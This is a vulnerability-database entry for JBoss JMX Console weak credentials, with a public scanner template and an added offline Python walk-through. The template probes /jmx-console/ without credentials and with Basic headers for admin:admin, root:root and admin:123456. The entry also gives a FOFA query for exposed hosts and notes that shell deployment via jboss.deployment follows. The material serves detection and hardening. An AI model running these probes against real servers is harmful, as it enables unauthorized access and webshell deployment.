jboss-xml-console-unauthorized: JBoss JMX Console Weak Credential Discovery

Date: 2025-09-01 | Affected software: JBoss | PoC: public

Vulnerability description

Uses jboss.deployment to deploy a shell. FOFA query: "jmx-console"

PoC code [public]

id: jboss-xml-console-unauthorized

info:
    name: JBoss JMX Console Weak Credential Discovery
    author: paradessia
    severity: high
    verified: true
    description: |
        利用jboss.deployment部署shell
        fofa: "jmx-console"
    reference:
        - https://xz.aliyun.com/t/6103

rules:
    r0:
        request:
            method: GET
            path: /jmx-console/
        expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
    r1:
        request:
            method: GET
            path: /jmx-console/
            headers:
                Authorization: "Basic YWRtaW46YWRtaW4="
        expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
    r2:
        request:
            method: GET
            path: /jmx-console/
            headers:
                Authorization: "Basic cm9vdDpyb290"
        expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
    r3:
        request:
            method: GET
            path: /jmx-console/
            headers:
                Authorization: "Basic YWRtaW46MTIzNDU2"
        expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
expression: r0() || r1() || r2() || r3()
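The template above has two distinct parts: r0 is an unauthenticated fingerprint (a 200 response to GET /jmx-console/ whose body contains both the "jboss.management.local" and "jboss.web" MBean domain names), while r1, r2 and r3 share one expression (a 200 response containing "JMImplementation") and differ only in the Basic Authorization header sent; `bcontains` is byte containment on the response body. The following Python, added here as an illustration and not part of the original PoC or of xray, re-implements that rule logic against constructed responses (labelled as such in the code) so the behaviour of the four rules can be traced offline, and decodes the three Basic tokens so an administrator can see which default accounts the template probes for and confirm they do not exist on their instance. The Response class and the sample bodies are assumptions made for the example.

```python
"""
Offline walk-through of the jboss-xml-console-unauthorized rule logic.

Added example, not part of the original PoC. It re-implements the rule
expressions against constructed responses so r0..r3 can be checked
without touching a live host, and decodes the Basic tokens so an
administrator knows which credential pairs the template tests for.
"""
import base64
from dataclasses import dataclass


@dataclass
class Response:
    """Minimal stand-in for the response object the rule expressions inspect."""
    status: int
    body: bytes


def decode_basic(header_value: str) -> tuple[str, str]:
    """Return (username, password) from an HTTP Basic Authorization value."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


# Authorization headers exactly as they appear in rules r1..r3 of the template.
POC_BASIC_HEADERS = [
    "Basic YWRtaW46YWRtaW4=",
    "Basic cm9vdDpyb290",
    "Basic YWRtaW46MTIzNDU2",
]


def r0(resp: Response) -> bool:
    """r0: an unauthenticated GET /jmx-console/ returns the MBean listing."""
    return (
        resp.status == 200
        and b"jboss.management.local" in resp.body
        and b"jboss.web" in resp.body
    )


def r_weak_cred(resp: Response) -> bool:
    """r1..r3 share one expression: a 200 page containing 'JMImplementation'."""
    return resp.status == 200 and b"JMImplementation" in resp.body


def poc_matches(unauth: Response, authed: list[Response]) -> bool:
    """Top-level expression of the template: r0() || r1() || r2() || r3()."""
    return r0(unauth) or any(r_weak_cred(r) for r in authed)


# Constructed sample responses (assumptions for this example, not real captures).
HARDENED_401 = Response(401, b"<html>401 Unauthorized</html>")
EXPOSED_LISTING = Response(
    200,
    b"<html>JMImplementation jboss.management.local jboss.web ...</html>",
)

if __name__ == "__main__":
    for header in POC_BASIC_HEADERS:
        print(header, "->", decode_basic(header))
    # A console that demands authentication and has no default accounts
    # answers 401 to every probe, so no rule fires.
    print("hardened host matches:", poc_matches(HARDENED_401, [HARDENED_401] * 3))
    # A console reachable without credentials trips r0 alone.
    print("exposed host matches:", poc_matches(EXPOSED_LISTING, [HARDENED_401] * 3))
```

Note that the three authenticated rules never fire against a console that answers 401, and r0 never fires against one that requires a login, so a JBoss instance on which the jmx-console security constraint is enabled and the default accounts have been removed will not match any rule of this template.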
